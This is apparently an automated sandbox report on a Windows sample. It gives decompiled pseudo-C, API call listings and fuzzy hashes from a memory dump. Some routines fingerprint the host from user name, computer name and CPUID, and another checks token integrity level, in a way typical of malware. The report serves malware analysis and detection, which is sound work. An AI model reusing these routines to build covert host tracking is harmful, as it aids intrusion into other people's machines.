                                                          • StrTrimA.SHLWAPI(00000000,0447C28C,?,050195B0), ref: 04474C4E
                                                            • Part of subcall function 0447361A: lstrlen.KERNEL32(05019A78,00000000,00000000,7742C740,044720ED,00000000), ref: 0447362A
                                                            • Part of subcall function 0447361A: lstrlen.KERNEL32(?), ref: 04473632
                                                            • Part of subcall function 0447361A: lstrcpy.KERNEL32(00000000,05019A78), ref: 04473646
                                                            • Part of subcall function 0447361A: lstrcat.KERNEL32(00000000,?), ref: 04473651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04474C6F
                                                          • lstrcpy.KERNEL32(?,?), ref: 04474C77
                                                          • lstrcat.KERNEL32(?,?), ref: 04474C85
                                                          • lstrcat.KERNEL32(?,00000000), ref: 04474C8B
                                                            • Part of subcall function 04479070: lstrlen.KERNEL32(?,00000000,05019A98,00000000,04478808,05019C76,?,?,?,?,?,63699BC3,00000005,0447D00C), ref: 04479077
                                                            • Part of subcall function 04479070: mbstowcs.NTDLL ref: 044790A0
                                                            • Part of subcall function 04479070: memset.NTDLL ref: 044790B2
                                                          • wcstombs.NTDLL ref: 04474D1C
                                                            • Part of subcall function 0447391F: SysAllocString.OLEAUT32(?), ref: 0447395A
                                                            • Part of subcall function 0447391F: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 044739DD
                                                            • Part of subcall function 0447A734: HeapFree.KERNEL32(00000000,00000000,04475637,00000000,?,?,00000000), ref: 0447A740
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04474D5D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04474D69
                                                          • HeapFree.KERNEL32(00000000,?,?,050195B0), ref: 04474D75
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04474D81
                                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04474D8D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 603507560-0
                                                          • Opcode ID: dc19c67fc88852eecd4d5474a07a40b24a82619c536d16f8bc2c965b783b40c7
                                                          • Instruction ID: 2bb9a26e6c3d34c490bee4d2516ba57a23c90f3c228342be6fff1a279c4e1b4e
                                                          • Opcode Fuzzy Hash: dc19c67fc88852eecd4d5474a07a40b24a82619c536d16f8bc2c965b783b40c7
                                                          • Instruction Fuzzy Hash: 739138B1900108AFEF11DFA5DC88AAEBBB9EF48354B144465E508E7220DB39ED53DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 51%
                                                          			E0447AC55(long _a4, long _a8) {
                                                          				signed int _v8;
                                                          				intOrPtr _v16;
                                                          				LONG* _v28;
                                                          				long _v40;
                                                          				long _v44;
                                                          				long _v48;
                                                          				CHAR* _v52;
                                                          				long _v56;
                                                          				CHAR* _v60;
                                                          				long _v64;
                                                          				signed int* _v68;
                                                          				char _v72;
                                                          				signed int _t76;
                                                          				signed int _t80;
                                                          				signed int _t81;
                                                          				intOrPtr* _t82;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t85;
                                                          				intOrPtr* _t90;
                                                          				intOrPtr* _t95;
                                                          				intOrPtr* _t98;
                                                          				struct HINSTANCE__* _t99;
                                                          				void* _t102;
                                                          				intOrPtr* _t104;
                                                          				void* _t115;
                                                          				long _t116;
                                                          				void _t125;
                                                          				void* _t131;
                                                          				signed short _t133;
                                                          				struct HINSTANCE__* _t138;
                                                          				signed int* _t139;
                                                          
                                                          				_t139 = _a4;
                                                          				_v28 = _t139[2] + 0x4470000;
                                                          				_t115 = _t139[3] + 0x4470000;
                                                          				_t131 = _t139[4] + 0x4470000;
                                                          				_v8 = _t139[7];
                                                          				_v60 = _t139[1] + 0x4470000;
                                                          				_v16 = _t139[5] + 0x4470000;
                                                          				_v64 = _a8;
                                                          				_v72 = 0x24;
                                                          				_v68 = _t139;
                                                          				_v56 = 0;
                                                          				asm("stosd");
                                                          				_v48 = 0;
                                                          				_v44 = 0;
                                                          				_v40 = 0;
                                                          				if(( *_t139 & 0x00000001) == 0) {
                                                          					_a8 =  &_v72;
                                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                          					return 0;
                                                          				}
                                                          				_t138 =  *_v28;
                                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                                          				_t133 =  *(_t131 + _t76);
                                                          				_a4 = _t76;
                                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                          				_v56 = _t80;
                                                          				_t81 = _t133 + 0x4470002;
                                                          				if(_t80 == 0) {
                                                          					_t81 = _t133 & 0x0000ffff;
                                                          				}
                                                          				_v52 = _t81;
                                                          				_t82 =  *0x447d1a0; // 0x0
                                                          				_t116 = 0;
                                                          				if(_t82 == 0) {
                                                          					L6:
                                                          					if(_t138 != 0) {
                                                          						L18:
                                                          						_t83 =  *0x447d1a0; // 0x0
                                                          						_v48 = _t138;
                                                          						if(_t83 != 0) {
                                                          							_t116 =  *_t83(2,  &_v72);
                                                          						}
                                                          						if(_t116 != 0) {
                                                          							L32:
                                                          							 *_a8 = _t116;
                                                          							L33:
                                                          							_t85 =  *0x447d1a0; // 0x0
                                                          							if(_t85 != 0) {
                                                          								_v40 = _v40 & 0x00000000;
                                                          								_v48 = _t138;
                                                          								_v44 = _t116;
                                                          								 *_t85(5,  &_v72);
                                                          							}
                                                          							return _t116;
                                                          						} else {
                                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                          								L27:
                                                          								_t116 = GetProcAddress(_t138, _v52);
                                                          								if(_t116 == 0) {
                                                          									_v40 = GetLastError();
                                                          									_t90 =  *0x447d19c; // 0x0
                                                          									if(_t90 != 0) {
                                                          										_t116 =  *_t90(4,  &_v72);
                                                          									}
                                                          									if(_t116 == 0) {
                                                          										_a4 =  &_v72;
                                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                          										_t116 = _v44;
                                                          									}
                                                          								}
                                                          								goto L32;
                                                          							} else {
                                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                          									_t116 =  *(_a4 + _v16);
                                                          									if(_t116 != 0) {
                                                          										goto L32;
                                                          									}
                                                          								}
                                                          								goto L27;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t98 =  *0x447d1a0; // 0x0
                                                          					if(_t98 == 0) {
                                                          						L9:
                                                          						_t99 = LoadLibraryA(_v60); // executed
                                                          						_t138 = _t99;
                                                          						if(_t138 != 0) {
                                                          							L13:
                                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                          								FreeLibrary(_t138);
                                                          							} else {
                                                          								if(_t139[6] != 0) {
                                                          									_t102 = LocalAlloc(0x40, 8);
                                                          									if(_t102 != 0) {
                                                          										 *(_t102 + 4) = _t139;
                                                          										_t125 =  *0x447d198; // 0x0
                                                          										 *_t102 = _t125;
                                                          										 *0x447d198 = _t102;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L18;
                                                          						}
                                                          						_v40 = GetLastError();
                                                          						_t104 =  *0x447d19c; // 0x0
                                                          						if(_t104 == 0) {
                                                          							L12:
                                                          							_a8 =  &_v72;
                                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                          							return _v44;
                                                          						}
                                                          						_t138 =  *_t104(3,  &_v72);
                                                          						if(_t138 != 0) {
                                                          							goto L13;
                                                          						}
                                                          						goto L12;
                                                          					}
                                                          					_t138 =  *_t98(1,  &_v72);
                                                          					if(_t138 != 0) {
                                                          						goto L13;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				_t116 =  *_t82(0,  &_v72);
                                                          				if(_t116 != 0) {
                                                          					goto L33;
                                                          				}
                                                          				goto L6;
                                                          			}
                                                          0x0447adc5
                                                          0x0447adb8
                                                          0x0447adaa
                                                          0x00000000
                                                          0x0447ada4
                                                          0x0447ad5d
                                                          0x0447ad60
                                                          0x0447ad67
                                                          0x0447ad77
                                                          0x0447ad7a
                                                          0x0447ad8a
                                                          0x00000000
                                                          0x0447ad90
                                                          0x0447ad71
                                                          0x0447ad75
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0447ad75
                                                          0x0447ad42
                                                          0x0447ad46
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0447ad46
                                                          0x0447ad1f
                                                          0x0447ad23
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0447ACCE
                                                          • LoadLibraryA.KERNELBASE(?), ref: 0447AD4B
                                                          • GetLastError.KERNEL32 ref: 0447AD57
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0447AD8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          • Opcode ID: 2bdb09a4faa2eb2b8b123c9246b94331e169256fec60c7ca5be37d07ccf780ba
                                                          • Instruction ID: 54593ce2f8d25f4048db7cc7ab37054ac96e769ea291bfd09d62562a46ddef7f
                                                          • Opcode Fuzzy Hash: 2bdb09a4faa2eb2b8b123c9246b94331e169256fec60c7ca5be37d07ccf780ba
                                                          • Instruction Fuzzy Hash: A4810975A40205AFEF20CFA8D884AEEB7F5EF48315F14842AE505E7340E7B4E946CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E044751B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				struct %anon52 _v8;
                                                          				long _v12;
                                                          				char _v16;
                                                          				char _v20;
                                                          				signed int _v24;
                                                          				intOrPtr _v32;
                                                          				union _LARGE_INTEGER _v36;
                                                          				intOrPtr _v40;
                                                          				void* _v44;
                                                          				void _v88;
                                                          				char _v92;
                                                          				struct %anon52 _t46;
                                                          				intOrPtr _t51;
                                                          				long _t53;
                                                          				void* _t54;
                                                          				struct %anon52 _t60;
                                                          				long _t64;
                                                          				signed int _t65;
                                                          				void* _t68;
                                                          				void* _t70;
                                                          				signed int _t71;
                                                          				intOrPtr _t73;
                                                          				intOrPtr _t76;
                                                          				void** _t78;
                                                          				void* _t80;
                                                          
                                                          				_t73 = __edx;
                                                          				_v92 = 0;
                                                          				memset( &_v88, 0, 0x2c);
                                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                          				_v44 = _t46;
                                                          				if(_t46 == 0) {
                                                          					_v8.LowPart = GetLastError();
                                                          				} else {
                                                          					_push(0xffffffff);
                                                          					_push(0xff676980);
                                                          					_push(0);
                                                          					_push( *0x447d240);
                                                          					_v20 = 0;
                                                          					_v16 = 0;
                                                          					L0447AF2E();
                                                          					_v36.LowPart = _t46;
                                                          					_v32 = _t73;
                                                          					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                          					_t51 =  *0x447d26c; // 0x2cc
                                                          					_v40 = _t51;
                                                          					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          					_v8.LowPart = _t53;
                                                          					if(_t53 == 0) {
                                                          						if(_a8 != 0) {
                                                          							L4:
                                                          							 *0x447d24c = 5;
                                                          						} else {
                                                          							_t68 = E04478D14(_t73); // executed
                                                          							if(_t68 != 0) {
                                                          								goto L4;
                                                          							}
                                                          						}
                                                          						_v12 = 0;
                                                          						L6:
                                                          						L6:
                                                          						if(_v12 == 1 && ( *0x447d260 & 0x00000001) == 0) {
                                                          							_v12 = 2;
                                                          						}
                                                          						_t71 = _v12;
                                                          						_t58 = _t71 << 4;
                                                          						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                          						_t72 = _t71 + 1;
                                                          						_v24 = _t71 + 1;
                                                          						_t60 = E0447A376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                                                          						_v8.LowPart = _t60;
                                                          						if(_t60 != 0) {
                                                          							goto L17;
                                                          						}
                                                          						_t65 = _v24;
                                                          						_v12 = _t65;
                                                          						_t90 = _t65 - 3;
                                                          						if(_t65 != 3) {
                                                          							goto L6;
                                                          						} else {
                                                          							_v8.LowPart = E044736B1(_t72, _t90,  &_v92, _a4, _a8);
                                                          						}
                                                          						goto L12;
                                                          						L17:
                                                          						__eflags = _t60 - 0x10d2;
                                                          						if(_t60 != 0x10d2) {
                                                          							_push(0xffffffff);
                                                          							_push(0xff676980);
                                                          							_push(0);
                                                          							_push( *0x447d244);
                                                          							goto L21;
                                                          						} else {
                                                          							__eflags =  *0x447d248; // 0x0
                                                          							if(__eflags == 0) {
                                                          								goto L12;
                                                          							} else {
                                                          								_t60 = E04476761();
                                                          								_push(0xffffffff);
                                                          								_push(0xdc3cba00);
                                                          								_push(0);
                                                          								_push( *0x447d248);
                                                          								L21:
                                                          								L0447AF2E();
                                                          								_v36.LowPart = _t60;
                                                          								_v32 = _t76;
                                                          								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                          								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          								_v8.LowPart = _t64;
                                                          								__eflags = _t64;
                                                          								if(_t64 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									goto L12;
                                                          								}
                                                          							}
                                                          						}
                                                          						L25:
                                                          					}
                                                          					L12:
                                                          					_t78 =  &_v92;
                                                          					_t70 = 3;
                                                          					do {
                                                          						_t54 =  *_t78;
                                                          						if(_t54 != 0) {
                                                          							HeapFree( *0x447d238, 0, _t54);
                                                          						}
                                                          						_t78 =  &(_t78[4]);
                                                          						_t70 = _t70 - 1;
                                                          					} while (_t70 != 0);
                                                          					CloseHandle(_v44);
                                                          				}
                                                          				return _v8;
                                                          				goto L25;
                                                          			}





























                                                          APIs
                                                          • memset.NTDLL ref: 044751C5
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 044751D1
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 044751F6
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04475212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0447522B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 044752C1
                                                          • CloseHandle.KERNEL32(?), ref: 044752D0
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0447530A
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04475D5E,?), ref: 04475320
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0447532B
                                                            • Part of subcall function 04478D14: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05019368,00000000,?,74B5F710,00000000,74B5F730), ref: 04478D63
                                                            • Part of subcall function 04478D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050193A0,?,00000000,30314549,00000014,004F0053,0501935C), ref: 04478E00
                                                            • Part of subcall function 04478D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0447523E), ref: 04478E12
                                                          • GetLastError.KERNEL32 ref: 0447533D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID:
                                                          • API String ID: 3521023985-0
                                                          • Opcode ID: ad39759240824d4aa39b16163785783550cb42fb40d9ea5b2db1e10f99260f15
                                                          • Instruction ID: 281091d887071099708b0d1a85cea85bf26a7a6d637276241f8700ed9c4c2ed4
                                                          • Opcode Fuzzy Hash: ad39759240824d4aa39b16163785783550cb42fb40d9ea5b2db1e10f99260f15
                                                          • Instruction Fuzzy Hash: D4513EB1801228BBEF119F95DC849EEFFB9EF49720F204616E511B6250D774AA46CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E0447232F(intOrPtr __edx, void** _a4, void** _a8) {
                                                          				intOrPtr _v8;
                                                          				struct _FILETIME* _v12;
                                                          				short _v56;
                                                          				struct _FILETIME* _t12;
                                                          				intOrPtr _t13;
                                                          				void* _t17;
                                                          				void* _t21;
                                                          				intOrPtr _t27;
                                                          				long _t28;
                                                          				void* _t30;
                                                          
                                                          				_t27 = __edx;
                                                          				_t12 =  &_v12;
                                                          				GetSystemTimeAsFileTime(_t12);
                                                          				_push(0x192);
                                                          				_push(0x54d38000);
                                                          				_push(_v8);
                                                          				_push(_v12);
                                                          				L0447AF28();
                                                          				_push(_t12);
                                                          				_v12 = _t12;
                                                          				_t13 =  *0x447d2a8; // 0xb9a5a8
                                                          				_t5 = _t13 + 0x447e87e; // 0x5018e26
                                                          				_t6 = _t13 + 0x447e59c; // 0x530025
                                                          				_push(0x16);
                                                          				_push( &_v56);
                                                          				_v8 = _t27;
                                                          				L0447ABCA();
                                                          				_t17 = CreateFileMappingW(0xffffffff, 0x447d2ac, 4, 0, 0x1000,  &_v56); // executed
                                                          				_t30 = _t17;
                                                          				if(_t30 == 0) {
                                                          					_t28 = GetLastError();
                                                          				} else {
                                                          					if(GetLastError() == 0xb7) {
                                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                          						if(_t21 == 0) {
                                                          							_t28 = GetLastError();
                                                          							if(_t28 != 0) {
                                                          								goto L6;
                                                          							}
                                                          						} else {
                                                          							 *_a4 = _t30;
                                                          							 *_a8 = _t21;
                                                          							_t28 = 0;
                                                          						}
                                                          					} else {
                                                          						_t28 = 2;
                                                          						L6:
                                                          						CloseHandle(_t30);
                                                          					}
                                                          				}
                                                          				return _t28;
                                                          			}














                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04475C31,?,?,4D283A53,?,?), ref: 0447233B
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04472351
                                                          • _snwprintf.NTDLL ref: 04472376
                                                          • CreateFileMappingW.KERNELBASE(000000FF,0447D2AC,00000004,00000000,00001000,?), ref: 04472392
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04475C31,?,?,4D283A53), ref: 044723A4
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 044723BB
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04475C31,?,?), ref: 044723DC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04475C31,?,?,4D283A53), ref: 044723E4
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: 558ec645c6b914fbcbfc6674ff89f2006695cced47ac79ca4e239d1ea5d27e86
                                                          • Instruction ID: f44a8acf4a2c6edc2b8809921da3ce24d321de2704e08a63096ccae38067afc4
                                                          • Opcode Fuzzy Hash: 558ec645c6b914fbcbfc6674ff89f2006695cced47ac79ca4e239d1ea5d27e86
                                                          • Instruction Fuzzy Hash: 4E21A572A40204BBEB21ABB4DC45FDE77A9FB44710F244166F605E72D0EAB4E907CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E04479135(char __eax, void* __esi) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v28;
                                                          				long _t34;
                                                          				signed int _t39;
                                                          				long _t50;
                                                          				char _t59;
                                                          				intOrPtr _t61;
                                                          				void* _t62;
                                                          				void* _t64;
                                                          				char _t65;
                                                          				intOrPtr* _t67;
                                                          				void* _t68;
                                                          				void* _t69;
                                                          
                                                          				_t69 = __esi;
                                                          				_t65 = __eax;
                                                          				_v8 = 0;
                                                          				_v12 = __eax;
                                                          				if(__eax == 0) {
                                                          					_t59 =  *0x447d270; // 0xd448b889
                                                          					_v12 = _t59;
                                                          				}
                                                          				_t64 = _t69;
                                                          				E0447A6CC( &_v12, _t64);
                                                          				if(_t65 != 0) {
                                                          					 *_t69 =  *_t69 ^  *0x447d2a4 ^ 0x4c0ca0ae;
                                                          				} else {
                                                          					GetUserNameW(0,  &_v8); // executed
                                                          					_t50 = _v8;
                                                          					if(_t50 != 0) {
                                                          						_t62 = RtlAllocateHeap( *0x447d238, 0, _t50 + _t50);
                                                          						if(_t62 != 0) {
                                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                          								_t64 = _t62;
                                                          								 *_t69 =  *_t69 ^ E04477306(_v8 + _v8, _t64);
                                                          							}
                                                          							HeapFree( *0x447d238, 0, _t62);
                                                          						}
                                                          					}
                                                          				}
                                                          				_t61 = __imp__;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				GetComputerNameW(0,  &_v8);
                                                          				_t34 = _v8;
                                                          				if(_t34 != 0) {
                                                          					_t68 = RtlAllocateHeap( *0x447d238, 0, _t34 + _t34);
                                                          					if(_t68 != 0) {
                                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                          							_t64 = _t68;
                                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04477306(_v8 + _v8, _t64);
                                                          						}
                                                          						HeapFree( *0x447d238, 0, _t68);
                                                          					}
                                                          				}
                                                          				asm("cpuid");
                                                          				_t67 =  &_v28;
                                                          				 *_t67 = 1;
                                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                          				 *(_t67 + 0xc) = _t64;
                                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                          				return _t39;
                                                          			}




















                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0447916C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04479183
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04479190
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04475D20), ref: 044791B1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 044791D8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 044791EC
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 044791F9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04475D20), ref: 04479217
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: 1b1aa1f9b1cc1d7573994106305391952437cbe5f3e07818f59790ae1bd922d0
                                                          • Instruction ID: 2d2427c0d7e3f86678fd5ebe2f14dee7b9a90863475622644d8b0658b8b4cb0e
                                                          • Opcode Fuzzy Hash: 1b1aa1f9b1cc1d7573994106305391952437cbe5f3e07818f59790ae1bd922d0
                                                          • Instruction Fuzzy Hash: 373117B1A00209EFFB10DFA9DC80AAEF7F9EF44244B11446AE504D7210EB34EE179B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04471A08(long* _a4) {
                                                          				long _v8;
                                                          				void* _v12;
                                                          				void _v16;
                                                          				long _v20;
                                                          				int _t33;
                                                          				void* _t46;
                                                          
                                                          				_v16 = 1;
                                                          				_v20 = 0x2000;
                                                          				if( *0x447d25c > 5) {
                                                          					_v16 = 0;
                                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                          						_v8 = 0;
                                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                          						if(_v8 != 0) {
                                                          							_t46 = E0447A71F(_v8);
                                                          							if(_t46 != 0) {
                                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                          								if(_t33 != 0) {
                                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                          								}
                                                          								E0447A734(_t46);
                                                          							}
                                                          						}
                                                          						CloseHandle(_v12);
                                                          					}
                                                          				}
                                                          				 *_a4 = _v20;
                                                          				return _v16;
                                                          			}










                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04471A3A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04471A5A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04471A6A
                                                          • CloseHandle.KERNEL32(00000000), ref: 04471ABA
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04471A8D
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04471A95
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04471AA5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: d34173407507bd3396dd00b0c06413e9164638a3d421549949b22a8a0d611834
                                                          • Instruction ID: f7101d3f0ccaf21336f99e1215070484ed02a928599bae6d3807846e3497a02d
                                                          • Opcode Fuzzy Hash: d34173407507bd3396dd00b0c06413e9164638a3d421549949b22a8a0d611834
                                                          • Instruction Fuzzy Hash: 47213CB5900289FFEF10DF94DC84EEEBBB9EF44304F1001A6EA11A6251D7759E46DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 0447395A
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 044739DD
                                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 04473A1D
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04473A3F
                                                            • Part of subcall function 04476F3A: SysAllocString.OLEAUT32(0447C290), ref: 04476F8A
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04473A92
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04473AA1
                                                            • Part of subcall function 04471AE2: Sleep.KERNELBASE(000001F4), ref: 04471B2A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
